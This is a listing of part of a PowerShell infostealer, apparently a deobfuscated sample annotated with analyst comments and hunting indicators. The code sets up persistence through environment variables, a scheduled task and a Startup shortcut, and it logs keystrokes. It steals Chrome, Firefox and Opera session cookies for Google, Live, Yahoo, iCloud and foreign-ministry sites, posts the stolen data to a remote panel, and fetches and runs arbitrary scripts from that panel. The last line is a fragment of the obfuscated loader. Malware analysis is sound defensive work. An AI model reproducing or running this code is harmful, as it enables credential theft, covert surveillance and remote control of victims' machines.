  722. $service.GetFolder("\").RegisterTaskDefinition($name,$task, 6,$null,$null, 0, $null) | Out-Null
  723. } catch {}
  724. }
  725.  
  726.  
  727.  
  # Persistence routine, called on every pass of the main loop.
  # The process command line captured in $global:commandline is cut into chunks of at most 1024
  # characters, and each chunk is stored in a User-scope environment variable named
  # <name>_<index>. A string of %<name>_0%%<name>_1%... placeholders is then used as the argument
  # of 'Cmd.exe /c START "" /min', registered both as a scheduled task and as a .lnk in the
  # user's Startup folder.
  # Hunting note: the payload does not need to exist as a file; look for User environment
  # variables named eSRfqHDaxC_<n> (persisted under HKCU\Environment) and for eSRfqHDaxC.lnk in
  # the Startup folder.
  728. function Startup {
  729.  
  730. $env_var = $global:commandline
  731.  
  732. $i = 0
  733. $param = ""
  734.  
  735. while ($env_var.Length -gt 0) {
  736. if ($env_var.Length -gt 1024) {
  737. $env_element = $env_var.Substring(0,1024)
  738. } else {
  739. $env_element = $env_var.Substring(0,$env_var.Length)
  740. }
  741.  
  742. [Environment]::SetEnvironmentVariable($global:name + '_' + $i,$env_element , 'User')
  743. $param = $param + "%" + $global:name + '_' + $i + "%"
  744. $i++
  745. if ($env_var.Length -gt 1024) {
  746. $env_var = $env_var.Remove(0,1024)
  747. } else {
  748. $env_var = $env_var.Remove(0,$env_var.Length)
  749. }
  750. }
  751. Taskscheduler ('Cmd.exe /c START "" /min ' + $param) $True
  752. $startup_folder = [System.Environment]::ExpandEnvironmentVariables("%appdata%") + "\Microsoft\Windows\Start Menu\Programs\Startup\"
  753. Shortcut ('Cmd.exe /c START "" /min ' + $param) ($startup_folder + "\" + $global:name + '.lnk') $True
  754.  
  755. }
  756.  
  # Tasking channel: downloads text from <panel_url>/api/pscript and, when it is not empty,
  # compiles it into a script block and runs it as a background job. Whatever the panel returns
  # is executed in the user's context, so the capabilities of an infection are not limited to
  # the code in this listing. Errors are swallowed.
  757. function BrowsersPS () {
  758.  
  759. $client = New-Object System.Net.WebClient
  760. try {
  761. $data = $client.DownloadString("$global:panel_url/api/pscript")
  762. if ($data -ne '') {
  763. $scriptBlock = ([scriptblock]::Create($data))
  764. Start-Job -ScriptBlock $scriptBlock
  765. # Invoke-Command -ScriptBlock $scriptBlock
  766. }
  767. } catch {}
  768.  
  769. }
  770.  
  # Uploads the keystroke log. Reads <install dir>\<name>.log (falling back to $env:TEMP when the
  # install directory does not exist), posts its content to <panel_url>/api/logger/submit with
  # a 60-second retry loop, and deletes the file once the upload has succeeded.
  # Errors, including a missing log file, are swallowed.
  771. function BrowsersLOGGER () {
  772.  
  773. $install_dir = [System.Environment]::ExpandEnvironmentVariables($global:install)
  774. if (!(Test-Path $install_dir)) {
  775. $install_dir = $env:TEMP
  776. }
  777.  
  778.  
  779. try {
  780. $data = [System.IO.File]::ReadAllText($install_dir + '\' + $global:name + '.log')
  781. if ($data -ne $null) {
  782. while ((urlPOST "$global:panel_url/api/logger/submit" $data) -eq $false) {
  783. Start-Sleep -s 60
  784. }
  785. Remove-Item ($install_dir + '\' + $global:name + '.log')
  786. }
  787.  
  788. } catch {}
  789.  
  790. }
  791.  
  # Starts the keystroke-capture script block as a background job, passing
  # <install dir>\<name>.log as its output path (install dir falls back to $env:TEMP).
  792. function InitLOGGER() {
  793.  
  794. $install_dir = [System.Environment]::ExpandEnvironmentVariables($global:install)
  795. if (!(Test-Path $install_dir)) {
  796. $install_dir = $env:TEMP
  797. }
  798. Start-Job -ScriptBlock $global:scriptblock_logger -ArgumentList ($install_dir + '\' + $global:name + '.log') | Out-Null
  799. }
  800.  
  801.  
  # For one target ($website host pattern, $cname cookie-name pattern) queries the Chrome,
  # Firefox (every matching profile) and Opera cookie stores, and posts each non-empty result
  # to <panel_url>/api/chrome/submit, /api/firefox/submit or /api/opera/submit respectively.
  # Each upload is retried every 60 seconds until urlPOST reports success.
  802. function BrowsersCOOKIES ($website,$cname) {
  803.  
  804. $ChromeDB = ChromeDB
  805. $ChromeSESSION = ''
  806. $ChromeSESSION = ChromeSESSION "$chromeDB\Cookies" $website $cname
  807. if ($ChromeSESSION) {
  808. while ((urlPOST "$global:panel_url/api/chrome/submit" $ChromeSESSION) -eq $false) {
  809. Start-Sleep -s 60
  810. }
  811.  
  812. }
  813.  
  814. $firefoxDB = firefoxDB
  815. foreach ($DB in $firefoxDB) {
  816. $FirefoxSESSION = ''
  817. $FirefoxSESSION = FirefoxSESSION "$DB\cookies.sqlite" $website $cname
  818. if ($FirefoxSESSION) {
  819. while ((urlPOST "$global:panel_url/api/firefox/submit" $FirefoxSESSION) -eq $false) {
  820. Start-Sleep -s 60
  821. }
  822. }
  823.  
  824. }
  825.  
  826. $OperaDB = OperaDB
  827. $OperaSESSION = ''
  828. $OperaSESSION = OperaSESSION "$OperaDB\Cookies" $website $cname
  829. if ($OperaSESSION) {
  830. while ((urlPOST "$global:panel_url/api/opera/submit" $OperaSESSION) -eq $false) {
  831. Start-Sleep -s 60
  832. }
  833.  
  834.  
  835. }
  836. }
  837.  
  838.  
  # Main section.
  # Single-instance guard: a named mutex "Global\<name>" is created, and the script exits when it
  # was not newly created. The mutex name is a host indicator for a running instance.
  839. $outMutex = ""
  840. $Mutex = New-Object -TypeName system.threading.mutex($true, "Global\$global:name", [ref] $outMutex)
  841. if (!$outMutex) {exit}
  842.  
  # Block until the SQLite library is available, retrying every 60 seconds.
  843. while ((Add-SQLite) -eq $false) {
  844. Start-Sleep -s 60
  845. }
  846.  
  847.  
  848. InitLOGGER
  # Collection loop, repeated every 900 seconds: Chrome logins, then session cookies for the
  # listed host patterns (each gated on one named authentication cookie), then the keystroke
  # log upload, persistence refresh and the remote-script fetch.
  849. while ($true) {
  850.  
  851.  
  852. BrowsersLOGINS
  853.  
  854. BrowsersCOOKIES "'%.google.%'" "'SSID'"
  855.  
  856. BrowsersCOOKIES "'%.live.%'" "'MSPAuth'"
  857.  
  858. BrowsersCOOKIES "'%.yahoo.%'" "'T'"
  859.  
  860. BrowsersCOOKIES "'%.mofa.gov.%'" "'cadataKey'"
  861.  
  862. BrowsersCOOKIES "'%.icloud.%'" "'X-APPLE-WEBAUTH-TOKEN'"
  863.  
  864. BrowsersLOGGER
  865.  
  866. Startup
  867. BrowsersPS
  868.  
  869. Start-Sleep -s 900
  870.  
  871. }' )"\" + [STRing][ChAr]44 + "\" [SYsteM.io.compresSion.COMpressIOnmODE]::dEComPrEss ) | FOReACh-OBjEcT {New-ObJECt iO.STREAMrEAdeR( `$_"\" + [STRing][ChAr]44 + "\" [SYstEm.TEXt.EncodiNG]::AScii ) }| FoREacH-objeCt{`$_.rEADtOENd( ) } ) | . ( `$PshOmE[21]+`$pSHOmE[34]+'x')"\" )